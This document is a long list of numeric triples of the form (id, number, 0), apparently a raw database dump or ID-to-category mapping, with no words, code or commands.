(266191,118,0),(266192,118,0),(266194,118,0),(266194,111,0),(266194,110,0),(266194,112,0),(266194,113,0),(266194,115,0),(266194,114,0),(266194,117,0),(266194,116,0),(266195,111,0),(266195,110,0),(266195,112,0),(266195,113,0),(266195,115,0),(266195,114,0),(266195,117,0),(266195,116,0),(266195,118,0),(266196,118,0),(266196,111,0),(266196,110,0),(266196,112,0),(266196,113,0),(266196,115,0),(266196,114,0),(266196,117,0),(266196,116,0),(266198,111,0),(266198,110,0),(266198,112,0),(266198,113,0),(266198,115,0),(266198,114,0),(266198,117,0),(266198,116,0),(266198,118,0),(266199,118,0),(266296,116,0),(266201,122,0),(266201,111,0),(266201,110,0),(266201,112,0),(266201,113,0),(266201,115,0),(266201,114,0),(266201,117,0),(266201,116,0),(266206,117,0),(266207,104,0),(266206,131,0),(266206,116,0),(266209,117,0),(266209,131,0),(266209,116,0),(266211,116,0),(266211,117,0),(266211,131,0),(266212,116,0),(266212,117,0),(266212,131,0),(266217,104,0),(266219,143,0),(266225,34,0),(266226,34,0),(266227,34,0),(266228,34,0),(266229,34,0),(266230,34,0),(266250,118,0),(266250,111,0),(266250,110,0),(266250,112,0),(266250,113,0),(266250,115,0),(266250,114,0),(266250,117,0),(266250,116,0),(266292,116,0),(266293,122,0),(266293,113,0),(266293,115,0),(266293,114,0),(266293,117,0),(266293,116,0),(266300,131,0),(266298,117,0),(266298,116,0),(266298,131,0),(266293,111,0),(266293,110,0),(266293,112,0),(266657,118,0),(266306,122,0),(266308,118,0),(266308,111,0),(266308,112,0),(266308,115,0),(266308,117,0),(266311,122,0),(266312,122,0),(266314,122,0),(266312,111,0),(266312,110,0),(266312,112,0),(266312,113,0),(266312,115,0),(266312,114,0),(266312,117,0),(266312,116,0),(266315,118,0),(266315,111,0),(266315,112,0),(266315,115,0),(266315,117,0),(266318,112,0),(266318,111,0),(266318,118,0),(266522,118,0),(266316,118,0),(266318,115,0),(266318,117,0),(266320,118,0),(266320,111,0),(266320,110,0),(266320,112,0),(266320,113,0),(266320,115,0),(266320,114,0),(266320,117,0),(266320,116,0),(266322,118,0),(266323,118,0),(266343,7,0),(266354,118,0),(266354,111,0),(266354,110,0),(266354,112,0),(266354,113,0),(266354,115,0),(266354,114,0),(266354,117,0),(266354,116,0),(266356,110,0),(266356,111,0),(266356,112,0),(266356,113,0),(266356,114,0),(266356,115,0),(266356,116,0),(266356,117,0),(266356,118,0),(266357,118,0),(266368,116,0),(266368,117,0),(266368,131,0),(266371,110,0),(266371,111,0),(266371,112,0),(266371,113,0),(266371,114,0),(266371,115,0),(266371,116,0),(266371,117,0),(266371,118,0),(266372,122,0),(266372,111,0),(266372,110,0),(266372,112,0),(266372,113,0),(266372,115,0),(266372,114,0),(266372,117,0),(266372,116,0),(266375,110,0),(266375,111,0),(266375,112,0),(266375,113,0),(266375,114,0),(266375,115,0),(266375,116,0),(266375,117,0),(266375,118,0),(266379,118,0),(266604,118,0),(266396,118,0),(266397,104,0),(266396,116,0),(266396,111,0),(266396,110,0),(266396,112,0),(266396,113,0),(266396,115,0),(266396,114,0),(266396,117,0),(266399,116,0),(266402,110,0),(266402,111,0),(266402,112,0),(266402,113,0),(266402,114,0),(266402,115,0),(266402,116,0),(266402,117,0),(266402,118,0),(266405,110,0),(266405,111,0),(266405,112,0),(266405,113,0),(266405,114,0),(266405,115,0),(266405,116,0),(266405,117,0),(266405,122,0),(266407,118,0),(266408,104,0),(266407,111,0),(266407,110,0),(266407,112,0),(266407,113,0),(266407,115,0),(266407,114,0),(266407,117,0),(266407,116,0),(266410,104,0),(266411,110,0),(266411,111,0),(266411,112,0),(266411,113,0),(266411,114,0),(266411,115,0),(266411,116,0),(266411,117,0),(266411,118,0),(266412,104,0),(266414,110,0),(266414,111,0),(266414,112,0),(266414,113,0),(266414,114,0),(266414,115,0),(266414,116,0),(266414,117,0),(266414,118,0),(266416,118,0),(266417,104,0),(266416,111,0),(266416,110,0),(266416,112,0),(266416,113,0),(266416,115,0),(266416,114,0),(266416,117,0),(266416,116,0),(266432,129,0),(266442,126,0),(266445,126,0),(266690,122,0),(266563,104,0),(266597,117,0),(266460,122,0),(266462,122,0),(266597,116,0),(266467,122,0),(266470,104,0),(268736,114,0),(268726,118,0),(268685,190,0),(268685,118,0),(266657,117,0),(266472,104,0),(266474,111,0),(266474,118,0),(266474,112,0),(266474,115,0),(266474,117,0),(266657,112,0),(266543,118,0),(266540,129,0),(266544,118,0),(265919,141,0),(266657,115,0),(266551,105,0),(266555,105,0),(266690,113,0),(266690,112,0),(266690,111,0),(266690,110,0),(268279,111,0),(266688,145,0),(266568,129,0),(266568,111,0),(266568,110,0),(266568,112,0),(266568,113,0),(266568,115,0),(266568,114,0),(266568,117,0),(266568,116,0),(266573,118,0),(266573,111,0),(266573,110,0),(266573,112,0),(266573,113,0),(266573,115,0),(266573,114,0),(266573,117,0),(266573,116,0),(266575,122,0),(266575,111,0),(266575,110,0),(266575,112,0),(266575,113,0),(266575,115,0),(266575,114,0),(266575,117,0),(266575,116,0),(266576,122,0),(266577,36,0),(266576,111,0),(266576,110,0),(266576,112,0),(266576,113,0),(266576,115,0),(266576,114,0),(266576,117,0),(266576,116,0),(266597,131,0),(266605,28,0),(267619,111,0),(267619,112,0),(267617,117,0),(267617,115,0),(267617,111,0),(267617,112,0),(267613,118,0),(267617,118,0),(266611,111,0),(266612,28,0),(266611,144,0),(266611,110,0),(266611,112,0),(266611,113,0),(266611,115,0),(266611,114,0),(266611,117,0),(266611,116,0),(266619,111,0),(266624,28,0),(266619,144,0),(266619,112,0),(266619,115,0),(266619,117,0),(266625,118,0),(266626,118,0),(266627,104,0),(266626,111,0),(266626,112,0),(266626,115,0),(266626,117,0),(266633,118,0),(266633,111,0),(266633,110,0),(266633,112,0),(266633,113,0),(266633,115,0),(266633,114,0),(266633,117,0),(266633,116,0),(266657,116,0),(266678,131,0),(266676,117,0),(266676,116,0),(266676,131,0),(266690,115,0),(266690,114,0),(266690,117,0),(266690,116,0),(266715,129,0),(266713,117,0),(266713,116,0),(266713,131,0),(266716,104,0),(266715,111,0),(266715,110,0),(266715,112,0),(266715,113,0),(266715,115,0),(266715,114,0),(266715,117,0),(266715,116,0),(266719,117,0),(266720,104,0),(266719,131,0),(266719,116,0),(266722,118,0),(266722,111,0),(266722,110,0),(266722,112,0),(266722,113,0),(266722,115,0),(266722,114,0),(266722,117,0),(266722,116,0),(266725,118,0),(266725,111,0),(266725,110,0),(266725,112,0),(266725,113,0),(266725,115,0),(266725,114,0),(266725,117,0),(266725,116,0),(266728,114,0),(266728,115,0),(266728,116,0),(266728,117,0),(266728,110,0),(266728,111,0),(266728,112,0),(266728,113,0),(266728,118,0),(266764,118,0),(266742,115,0),(266742,116,0),(266742,117,0),(266742,110,0),(266742,111,0),(266742,112,0),(266742,113,0),(266742,114,0),(266742,118,0),(266743,126,0),(266761,63,0),(266764,111,0),(266764,112,0),(266764,115,0),(266764,117,0),(266766,126,0),(266818,104,0),(266934,99,0),(266815,118,0),(266816,104,0),(266815,111,0),(266815,110,0),(266815,112,0),(266815,113,0),(266815,115,0),(266815,114,0),(266815,117,0),(266815,116,0),(266813,146,0),(266813,111,0),(266813,110,0),(266813,112,0),(266813,113,0),(266813,115,0),(266813,114,0),(266813,117,0),(266813,116,0),(266820,129,0),(266821,104,0),(266820,111,0),(266820,110,0),(266820,112,0),(266820,113,0),(266820,115,0),(266820,114,0),(266820,117,0),(266820,116,0),(267102,116,0),(266826,117,0),(266827,122,0),(266826,131,0),(266826,116,0),(266829,118,0),(266829,111,0),(266829,110,0),(266829,112,0),(266829,113,0),(266829,115,0),(266829,114,0),(266829,117,0),(266829,116,0),(266831,110,0),(266831,111,0),(266831,112,0),(266831,113,0),(266831,114,0),(266831,115,0),(266831,116,0),(266831,117,0),(266831,118,0),(266832,110,0),(266832,111,0),(266832,112,0),(266832,113,0),(266832,114,0),(266832,115,0),(266832,116,0),(266832,117,0),(266832,118,0),(266838,122,0),(266839,104,0),(266838,111,0),(266838,110,0),(266838,112,0),(266838,113,0),(266838,115,0),(266838,114,0),(266838,117,0),(266838,116,0),(266841,118,0),(266841,111,0),(266841,112,0),(266841,115,0),(266841,117,0),(266849,118,0),(266844,117,0),(266844,116,0),(266844,131,0),(266849,111,0),(266849,110,0),(266849,112,0),(266849,113,0),(266849,115,0),(266849,114,0),(266849,117,0),(266849,116,0),(266871,115,0),(266871,147,0),(266871,114,0),(266874,104,0),(266908,150,0),(266907,150,0),(266906,150,0),(266883,122,0),(266884,104,0),(266883,111,0),(266883,110,0),(266883,112,0),(266883,113,0),(266883,115,0),(266883,114,0),(266883,117,0),(266883,116,0),(266888,111,0),(266889,104,0),(266888,149,0),(266888,110,0),(266888,112,0),(266888,113,0),(266888,115,0),(266888,114,0),(266888,117,0),(266888,116,0),(266850,104,0),(266845,104,0),(266830,104,0),(266726,104,0),(266951,104,0),(267103,117,0),(267103,161,0),(267103,116,0),(267102,161,0),(267101,161,0),(267102,117,0),(267101,117,0),(267101,116,0),(266976,152,0),(266976,153,0),(266976,154,0),(266976,155,0),(266977,156,0),(266977,157,0),(266977,154,0),(266977,158,0),(266977,159,0),(266978,152,0),(266978,153,0),(266978,154,0),(266978,155,0),(266979,156,0),(266979,157,0),(266979,154,0),(266979,158,0),(266979,159,0),(266980,152,0),(266980,153,0),(266980,154,0),(266980,155,0),(266981,156,0),(266981,157,0),(266981,154,0),(266981,158,0),(266981,159,0),(266983,131,0),(266983,117,0),(266983,116,0),(266988,122,0),(266988,111,0),(266988,110,0),(266988,112,0),(266988,113,0),(266988,115,0),(266988,114,0),(266988,117,0),(266988,116,0),(266990,115,0),(266990,116,0),(266990,117,0),(266990,110,0),(266990,111,0),(266990,112,0),(266990,113,0),(266990,114,0),(266994,118,0),(266990,146,0),(266994,111,0),(266994,110,0),(266994,112,0),(266994,113,0),(266994,115,0),(266994,114,0),(266994,117,0),(266994,116,0),(266996,129,0),(266996,111,0),(266996,110,0),(266996,112,0),(266996,113,0),(266996,115,0),(266996,114,0),(266996,117,0),(266996,116,0),(267018,99,0),(266998,117,0),(266998,116,0),(266998,131,0),(267037,122,0),(267038,104,0),(267037,111,0),(267037,110,0),(267037,112,0),(267037,113,0),(267037,115,0),(267037,114,0),(267037,117,0),(267037,116,0),(267041,118,0),(267041,111,0),(267041,110,0),(267041,112,0),(267041,113,0),(267041,115,0),(267041,114,0),(267041,117,0),(267041,116,0),(267043,118,0),(267043,111,0),(267043,110,0),(267043,112,0),(267043,113,0),(267043,115,0),(267043,114,0),(267043,117,0),(267043,116,0),(267044,129,0),(267044,111,0),(267044,110,0),(267044,112,0),(267044,113,0),(267044,115,0),(267044,114,0),(267044,117,0),(267044,116,0),(267060,160,0),(267092,118,0),(267105,116,0),(267105,117,0),(267105,161,0),(267106,116,0),(267106,117,0),(267106,161,0),(267108,116,0),(267108,117,0),(267108,161,0),(269412,129,0),(267117,99,0),(269412,191,0),(268201,34,0),(267185,113,0),(267185,114,0),(267185,115,0),(267185,116,0),(267185,117,0),(267185,110,0),(267185,111,0),(267185,112,0),(267185,118,0),(267186,146,0),(267186,111,0),(267186,110,0),(267201,99,0),(267207,118,0),(267208,104,0),(267207,111,0),(267207,110,0),(267207,112,0),(267207,113,0),(267207,115,0),(267207,114,0),(267207,117,0),(267207,116,0),(267211,117,0),(267212,104,0),(267211,131,0),(267211,116,0),(267217,126,0),(267054,160,0),(267053,160,0),(267050,160,0),(267051,160,0),(267045,104,0),(266997,104,0),(266995,104,0),(267104,104,0),(266984,104,0),(266736,104,0),(266734,104,0),(266714,104,0),(266677,104,0),(266658,104,0),(266634,104,0),(266598,104,0),(266569,104,0),(266567,104,0),(266378,104,0),(266373,104,0),(266369,104,0),(266355,104,0),(266321,104,0),(266299,104,0),(266294,104,0),(266202,104,0),(266197,104,0),(266179,104,0),(265988,142,0),(265983,142,0),(265950,142,0),(265947,142,0),(265944,142,0),(265941,142,0),(265939,142,0),(267219,122,0),(267220,104,0),(267219,111,0),(267219,110,0),(267219,112,0),(267219,113,0),(267219,115,0),(267219,114,0),(267219,117,0),(267219,116,0),(267222,118,0),(267223,104,0),(267222,111,0),(267222,112,0),(267222,115,0),(267222,117,0),(267230,122,0),(267230,111,0),(267230,110,0),(267230,112,0),(267230,113,0),(267230,115,0),(267230,114,0),(267230,117,0),(267230,116,0),(267233,104,0),(267231,162,0),(267231,111,0),(267231,110,0),(267231,112,0),(267231,113,0),(267231,115,0),(267231,114,0),(267231,117,0),(267231,116,0),(267237,129,0),(267237,111,0),(267237,110,0),(267237,112,0),(267237,113,0),(267237,115,0),(267237,114,0),(267237,117,0),(267237,116,0),(267252,118,0),(267256,104,0),(267252,111,0),(267252,110,0),(267252,112,0),(267252,113,0),(267252,115,0),(267252,114,0),(267252,117,0),(267252,116,0),(267268,118,0),(267269,104,0),(267268,111,0),(267268,110,0),(267268,112,0),(267268,113,0),(267268,115,0),(267268,114,0),(267268,117,0),(267268,116,0),(267309,118,0),(267310,104,0),(267309,111,0),(267309,110,0),(267309,112,0),(267309,113,0),(267309,115,0),(267309,114,0),(267309,117,0),(267309,116,0),(267447,112,0),(267334,118,0),(267334,111,0),(267334,110,0),(267334,112,0),(267334,113,0),(267334,115,0),(267334,114,0),(267334,117,0),(267334,116,0),(267338,118,0),(267339,104,0),(267338,111,0),(267338,110,0),(267338,112,0),(267338,113,0),(267338,115,0),(267338,114,0),(267338,117,0),(267338,116,0),(267554,129,0),(267342,33,0),(267341,111,0),(267341,110,0),(267341,112,0),(267341,113,0),(267341,115,0),(267341,114,0),(267341,117,0),(267341,116,0),(267341,122,0),(267345,122,0),(267345,111,0),(267345,112,0),(267345,115,0),(267345,117,0),(267346,118,0),(267346,111,0),(267346,112,0),(267346,115,0),(267346,117,0),(267345,110,0),(267345,113,0),(267345,114,0),(267345,116,0),(267350,104,0),(267356,59,0),(267368,59,0),(267408,129,0),(267409,104,0),(267408,111,0),(267408,110,0),(267408,112,0),(267408,113,0),(267408,115,0),(267408,114,0),(267408,117,0),(267408,116,0),(268039,166,0),(267433,117,0),(268038,166,0),(267433,111,0),(267433,112,0),(268038,114,0),(268038,115,0),(267433,115,0),(267447,163,0),(267433,129,0),(267449,110,0),(267449,111,0),(267449,112,0),(267449,113,0),(267449,114,0),(267449,115,0),(267449,116,0),(267449,117,0),(267457,160,0),(267449,164,0),(267511,122,0),(267511,111,0),(267511,110,0),(267511,112,0),(267511,113,0),(267511,115,0),(267511,114,0),(267511,117,0),(267511,116,0),(267513,118,0),(267513,111,0),(267513,110,0),(267513,112,0),(267513,113,0),(267513,115,0),(267513,114,0),(267513,117,0),(267513,116,0),(267514,165,0),(267514,111,0),(267514,110,0),(267514,115,0),(267514,114,0),(267515,115,0),(267515,110,0),(267515,111,0),(267515,114,0),(267515,165,0),(267532,126,0),(267539,118,0),(267539,111,0),(267539,110,0),(267539,112,0),(267539,113,0),(267539,115,0),(267539,114,0),(267539,117,0),(267539,116,0),(267554,111,0),(267554,110,0),(267554,112,0),(267554,113,0),(267554,115,0),(267554,114,0),(267554,117,0),(267554,116,0),(267568,122,0),(267568,111,0),(267568,110,0),(267568,112,0),(267568,113,0),(267568,115,0),(267568,114,0),(267568,117,0),(267568,116,0),(267569,110,0),(267569,111,0),(267569,112,0),(267569,113,0),(267569,114,0),(267569,115,0),(267569,116,0),(267569,117,0),(267569,118,0),(267570,112,0),(268077,169,0),(268074,179,0),(267570,115,0),(268048,169,0),(267570,117,0),(268095,179,0),(267570,111,0),(267570,118,0),(267571,118,0),(267571,111,0),(267573,166,0),(267571,112,0),(267573,114,0),(267571,115,0),(267573,115,0),(267571,117,0),(267575,166,0),(267577,129,0),(267576,111,0),(267576,110,0),(267576,115,0),(267576,114,0),(267576,167,0),(267577,111,0),(267577,110,0),(267577,112,0),(267577,113,0),(267577,115,0),(267577,114,0),(267577,117,0),(267577,116,0),(267579,118,0),(267579,111,0),(267579,110,0),(267579,112,0),(267579,113,0),(267579,115,0),(267579,114,0),(267579,117,0),(267579,116,0),(267609,122,0),(267609,111,0),(267609,110,0),(267609,112,0),(267609,113,0),(267609,115,0),(267609,114,0),(267609,117,0),(267609,116,0),(267619,115,0),(267619,117,0),(267619,118,0),(267620,118,0),(267624,118,0),(268855,104,0),(268850,118,0),(268848,112,0),(268848,118,0),(267624,111,0),(267624,110,0),(267624,112,0),(267624,113,0),(267624,115,0),(267624,114,0),(267624,117,0),(267624,116,0),(268736,110,0),(267648,176,0),(268736,112,0),(267667,178,0),(267708,169,0),(267672,169,0),(267687,37,0),(267693,118,0),(267692,111,0),(267692,110,0),(267692,112,0),(267692,113,0),(267692,115,0),(267692,114,0),(267692,117,0),(267692,116,0),(267692,118,0),(267695,122,0),(267694,111,0),(267694,110,0),(267694,112,0),(267694,113,0),(267694,115,0),(267694,114,0),(267694,117,0),(267694,116,0),(267694,122,0),(267696,118,0),(267698,111,0),(267697,111,0),(267697,110,0),(267697,112,0),(267697,113,0),(267697,115,0),(267697,114,0),(267697,117,0),(267697,116,0),(267697,170,0),(267698,110,0),(267698,112,0),(267698,113,0),(267698,115,0),(267698,114,0),(267698,117,0),(267698,116,0),(267699,118,0),(267698,118,0),(267700,110,0),(267700,111,0),(267700,112,0),(267700,113,0),(267700,114,0),(267700,115,0),(267700,116,0),(267700,117,0),(267700,118,0),(267701,117,0),(267701,110,0),(267701,111,0),(267701,112,0),(267701,113,0),(267701,114,0),(267701,115,0),(267701,116,0),(267701,118,0),(268014,173,0),(267730,129,0),(267731,104,0),(267730,111,0),(267730,110,0),(267730,112,0),(267730,113,0),(267730,115,0),(267730,114,0),(267730,117,0),(267730,116,0),(267733,111,0),(267734,104,0),(267733,171,0),(267733,110,0),(267733,112,0),(267733,113,0),(267733,115,0),(267733,114,0),(267733,117,0),(267733,116,0),(267767,28,0),(267768,28,0),(267769,28,0),(267823,175,0),(267771,28,0),(267852,178,0),(267828,175,0),(267786,173,0),(267787,173,0),(267788,173,0),(267789,173,0),(267790,173,0),(267792,173,0),(267793,173,0),(267794,173,0),(267799,173,0),(267800,173,0),(267801,173,0),(267802,173,0),(267803,173,0),(267804,173,0),(267807,114,0),(267807,115,0),(267807,166,0),(268171,118,0),(267810,104,0),(267809,117,0),(267809,116,0),(267809,132,0),(267865,173,0),(267812,117,0),(267812,116,0),(267812,132,0),(267814,104,0),(267813,117,0),(267813,116,0),(267813,131,0),(267872,122,0),(267872,111,0),(267872,110,0),(267872,112,0),(267872,113,0),(267872,115,0),(267872,114,0),(267872,117,0),(267872,116,0),(268736,113,0),(268012,173,0),(268736,115,0),(267895,118,0),(267897,63,0),(267919,111,0),(267919,110,0),(267919,112,0),(267919,113,0),(267919,115,0),(267919,114,0),(267919,117,0),(267919,116,0),(267921,177,0),(268005,180,0),(268015,173,0),(268016,173,0),(267933,177,0),(267990,179,0),(268017,173,0),(268236,37,0),(268025,118,0),(268025,111,0),(268025,110,0),(268025,112,0),(268025,113,0),(268025,115,0),(268025,114,0),(268025,117,0),(268025,116,0),(269121,166,0),(269323,111,0),(269143,112,0),(269323,122,0),(269121,114,0),(269123,166,0),(269121,115,0),(269123,192,0),(269121,192,0),(268102,180,0),(268030,104,0),(268029,111,0),(268029,110,0),(268029,170,0),(268031,111,0),(268031,110,0),(268031,115,0),(268031,114,0),(268031,165,0),(268118,181,0),(268119,181,0),(268150,122,0),(268150,111,0),(268150,110,0),(268150,112,0),(268150,113,0),(268150,115,0),(268150,114,0),(268150,117,0),(268150,116,0),(268151,104,0),(268171,110,0),(268157,111,0),(268157,110,0),(268171,111,0),(268161,131,0),(268157,171,0),(268161,116,0),(268172,104,0),(268161,117,0),(268158,171,0),(268159,110,0),(268159,111,0),(268171,116,0),(268171,117,0),(268171,114,0),(268171,115,0),(268171,113,0),(268171,112,0),(268159,171,0),(268178,161,0),(268177,161,0),(268181,161,0),(268179,170,0),(268181,117,0),(268181,116,0),(268179,111,0),(268179,110,0),(268193,111,0),(268195,110,0),(268195,111,0),(268193,165,0),(268178,117,0),(268178,116,0),(268177,117,0),(268177,116,0),(268193,110,0),(269140,201,0),(268195,122,0),(269143,185,0),(269144,192,0),(269143,194,0),(269143,113,0),(269140,113,0),(269140,186,0),(269141,104,0),(269140,112,0),(268213,112,0),(268213,113,0),(268213,115,0),(268213,114,0),(268213,117,0),(268213,116,0),(268215,110,0),(268215,111,0),(268215,112,0),(268215,113,0),(268215,114,0),(268215,115,0),(268215,116,0),(268215,117,0),(268215,118,0),(268216,114,0),(268216,115,0),(268216,116,0),(268216,117,0),(268216,110,0),(268216,111,0),(268216,112,0),(268216,113,0),(268216,118,0),(268243,116,0),(268243,117,0),(268246,111,0),(268243,183,0),(268244,184,0),(268246,110,0),(268244,115,0),(268244,114,0),(268246,112,0),(268246,113,0),(268246,114,0),(268246,115,0),(268246,116,0),(268246,117,0),(268246,118,0),(268248,113,0),(268248,114,0),(268248,115,0),(268248,116,0),(268248,117,0),(268248,110,0),(268248,111,0),(268248,112,0),(268248,118,0),(268705,175,0),(268411,185,0),(268691,175,0),(269265,117,0),(268252,185,0),(268251,185,0),(268252,112,0),(268280,104,0),(268258,112,0),(268256,104,0),(268255,112,0),(268195,113,0),(268255,185,0),(268259,104,0),(268258,186,0),(268258,113,0),(268265,112,0),(268262,112,0),(268279,122,0),(268262,185,0),(268264,112,0),(268195,112,0),(268264,185,0),(268266,104,0),(268265,121,0),(268265,113,0),(268268,126,0),(267578,104,0),(269092,99,0),(268247,104,0),(268245,104,0),(268214,104,0),(268211,104,0),(268209,104,0),(268198,104,0),(268196,104,0),(268194,104,0),(268180,104,0),(268162,104,0),(268042,37,0),(268044,37,0),(268043,37,0),(268041,37,0),(268279,110,0),(266522,111,0),(266522,112,0),(266522,115,0),(266522,117,0),(268282,112,0),(268282,111,0),(268282,117,0),(268282,115,0),(268282,122,0),(268295,169,0),(268290,169,0),(268313,42,0),(268593,111,0),(268407,104,0),(268406,112,0),(268406,113,0),(268406,185,0),(269149,115,0),(269149,112,0),(269148,104,0),(268565,185,0),(268531,114,0),(268531,115,0),(268565,112,0),(268531,166,0),(269082,99,0),(268461,192,0),(268410,112,0),(268410,113,0),(268565,113,0),(268530,166,0),(268415,104,0),(268410,185,0),(269043,126,0),(268520,126,0),(266540,191,0),(268516,126,0),(268518,126,0),(269145,104,0),(269146,186,0),(269147,122,0),(269146,201,0),(269146,113,0),(269144,185,0),(269146,112,0),(269144,112,0),(269144,113,0),(268422,117,0),(268419,111,0),(268419,110,0),(268419,187,0),(268422,116,0),(268420,117,0),(268420,131,0),(268420,116,0),(268427,113,0),(268422,161,0),(268425,118,0),(268736,111,0),(268736,197,0),(268736,122,0),(268423,161,0),(268423,116,0),(268423,117,0),(268730,191,0),(268426,112,0),(268427,112,0),(268426,185,0),(268429,104,0),(268427,185,0),(268430,118,0),(268430,111,0),(268430,110,0),(268430,112,0),(268430,113,0),(268430,115,0),(268430,114,0),(268430,117,0),(268430,116,0),(268593,171,0),(268440,118,0),(268445,104,0),(268737,189,0),(268449,104,0),(268447,166,0),(268447,115,0),(268447,114,0),(268454,104,0),(268451,104,0),(268450,171,0),(268450,111,0),(268450,110,0),(268452,165,0),(268452,111,0),(268452,110,0),(268452,115,0),(268452,114,0),(268633,111,0),(268634,104,0),(268639,111,0),(268657,189,0),(268620,189,0),(268461,166,0),(268477,117,0),(268478,131,0),(268462,104,0),(268461,115,0),(268461,114,0),(268477,116,0),(268477,131,0),(268479,116,0),(268479,117,0),(268481,116,0),(268479,161,0),(268481,117,0),(268481,161,0),(268482,129,0),(268482,111,0),(268482,110,0),(268482,112,0),(268482,113,0),(268482,115,0),(268482,114,0),(268482,117,0),(268482,116,0),(268561,126,0),(268484,122,0),(268596,187,0),(268484,111,0),(268484,110,0),(268484,112,0),(268484,113,0),(268484,115,0),(268484,114,0),(269149,118,0),(269149,111,0),(269147,110,0),(269147,192,0),(268568,113,0),(268595,187,0),(268595,110,0),(268595,111,0),(268568,185,0),(268633,115,0),(268633,112,0),(268568,112,0),(268593,110,0),(268633,117,0),(268633,129,0),(268661,192,0),(268661,131,0),(268661,116,0),(268645,189,0),(268643,189,0),(268639,193,0),(268639,110,0),(268661,117,0),(268641,104,0),(268265,190,0),(268568,192,0),(269147,111,0),(268479,190,0),(268406,192,0),(268678,118,0),(268685,117,0),(268685,116,0),(268685,114,0),(268685,115,0),(268685,112,0),(268685,113,0),(268685,111,0),(268685,110,0),(269231,40,0),(269230,40,0),(269260,129,0),(269260,111,0),(269260,191,0),(269259,190,0),(269259,117,0),(269259,116,0),(269259,115,0),(269259,114,0),(268730,129,0),(268681,118,0),(268681,192,0),(268682,129,0),(268682,191,0),(268678,190,0),(268736,117,0),(268736,116,0),(268742,189,0),(268743,122,0),(268744,104,0),(268743,192,0),(268743,111,0),(268743,110,0),(268745,118,0),(268745,111,0),(268745,112,0),(268745,115,0),(268745,117,0),(268747,185,0),(268748,104,0),(268747,194,0),(268747,112,0),(268747,113,0),(268750,189,0),(268751,192,0),(268751,185,0),(268751,112,0),(268751,113,0),(268753,115,0),(268753,113,0),(268752,112,0),(268752,113,0),(268753,112,0),(268753,110,0),(268753,111,0),(268753,118,0),(268752,190,0),(268753,114,0),(268752,185,0),(268753,117,0),(268753,116,0),(268753,192,0),(268755,104,0),(268759,192,0),(268759,111,0),(268759,110,0),(268759,187,0),(268761,187,0),(268761,192,0),(268762,190,0),(268762,111,0),(268762,110,0),(268762,171,0),(268763,187,0),(268763,192,0),(268764,171,0),(268764,190,0),(268765,110,0),(268765,111,0),(268765,192,0),(268794,118,0),(268765,165,0),(268794,192,0),(268794,111,0),(268794,110,0),(268794,112,0),(268794,113,0),(268794,115,0),(268794,114,0),(268794,117,0),(268794,116,0),(268828,105,0),(268797,131,0),(268797,192,0),(268827,105,0),(268797,117,0),(268797,116,0),(268251,112,0),(268251,113,0),(268837,113,0),(268835,198,0),(268835,192,0),(268837,112,0),(268835,112,0),(268835,113,0),(268837,192,0),(268837,198,0),(268838,112,0),(268838,113,0),(268838,192,0),(268838,198,0),(268839,112,0),(268840,104,0),(268839,192,0),(268839,185,0),(268839,113,0),(268411,112,0),(268411,113,0),(268411,194,0),(268843,112,0),(268843,113,0),(268843,194,0),(268843,185,0),(268844,192,0),(268845,104,0),(268844,185,0),(268844,112,0),(268844,113,0),(268846,192,0),(268846,112,0),(268846,185,0),(269265,114,0),(268859,118,0),(268947,112,0),(268947,113,0),(268860,122,0),(268857,104,0),(268860,111,0),(268860,110,0),(268859,111,0),(268860,192,0),(269260,112,0),(269260,110,0),(269265,192,0),(269264,104,0),(269262,192,0),(269260,116,0),(269260,114,0),(269260,117,0),(269260,113,0),(269260,115,0),(268869,104,0),(268871,111,0),(268871,110,0),(268873,187,0),(268871,192,0),(268871,187,0),(268873,192,0),(268874,111,0),(268874,110,0),(268874,192,0),(268876,110,0),(268874,165,0),(268876,111,0),(269002,99,0),(268876,190,0),(268876,171,0),(269259,118,0),(268981,199,0),(268979,199,0),(268879,131,0),(268879,192,0),(268880,117,0),(268880,116,0),(268880,192,0),(268914,117,0),(268880,132,0),(268912,117,0),(268912,116,0),(268912,149,0),(268914,116,0),(269262,171,0),(268914,190,0),(268914,131,0),(269265,118,0),(269262,110,0),(268934,111,0),(269265,113,0),(269265,115,0),(269265,112,0),(269265,110,0),(269266,104,0),(269265,111,0),(269262,111,0),(268934,110,0),(268934,112,0),(268934,113,0),(268934,115,0),(268934,114,0),(268934,117,0),(268934,116,0),(268935,129,0),(268934,118,0),(268934,192,0),(268935,191,0),(268730,111,0),(268730,110,0),(268730,112,0),(268730,113,0),(268730,115,0),(268730,114,0),(268730,117,0),(268730,116,0),(268940,118,0),(268940,111,0),(268940,110,0),(268940,112,0),(268940,113,0),(268940,115,0),(268940,114,0),(268940,117,0),(268940,116,0),(268940,190,0),(266543,192,0),(268947,194,0),(268947,185,0),(268948,104,0),(268950,112,0),(268950,113,0),(268950,185,0),(268951,104,0),(268950,190,0),(268953,192,0),(268954,104,0),(268953,111,0),(268953,110,0),(268953,171,0),(267696,192,0),(268956,32,0),(268958,162,0),(268958,111,0),(268961,104,0),(268958,197,0),(268958,110,0),(268958,112,0),(268958,113,0),(268958,115,0),(268958,114,0),(268958,117,0),(268958,116,0),(268962,192,0),(268963,192,0),(268964,104,0),(268963,112,0),(268963,113,0),(268963,185,0),(268972,192,0),(268966,28,0),(268965,112,0),(268965,192,0),(268965,185,0),(268972,111,0),(268973,104,0),(268972,187,0),(268972,110,0),(269259,111,0),(269018,122,0),(269018,111,0),(269018,110,0),(269018,192,0),(269020,99,0),(269107,122,0),(269108,122,0),(269108,190,0),(269107,111,0),(269107,110,0),(269107,190,0),(269109,191,0),(269109,129,0),(269109,111,0),(269109,110,0),(269109,112,0),(269109,113,0),(269109,115,0),(269109,114,0),(269109,117,0),(269109,116,0),(269110,129,0),(269110,191,0),(269111,192,0),(269111,118,0),(269111,111,0),(269111,110,0),(269111,112,0),(269111,113,0),(269111,115,0),(269111,114,0),(269111,117,0),(269111,116,0),(269118,192,0),(269268,192,0),(269118,111,0),(269118,110,0),(269118,200,0),(269268,118,0),(269269,104,0),(269268,111,0),(269268,110,0),(269268,112,0),(269268,113,0),(269268,115,0),(269268,114,0),(269268,117,0),(269268,116,0),(269272,110,0),(269272,111,0),(269272,112,0),(269272,113,0),(269272,114,0),(269272,115,0),(269272,116,0),(269272,117,0),(269272,202,0),(269272,122,0),(269301,166,0),(269323,110,0),(269301,192,0),(269147,204,0),(269302,166,0),(269302,192,0),(269301,115,0),(269301,114,0),(269323,192,0),(269324,112,0),(269324,113,0),(269324,185,0),(269325,104,0),(269324,190,0),(269326,112,0),(269326,113,0),(269326,194,0),(269326,185,0),(269329,115,0)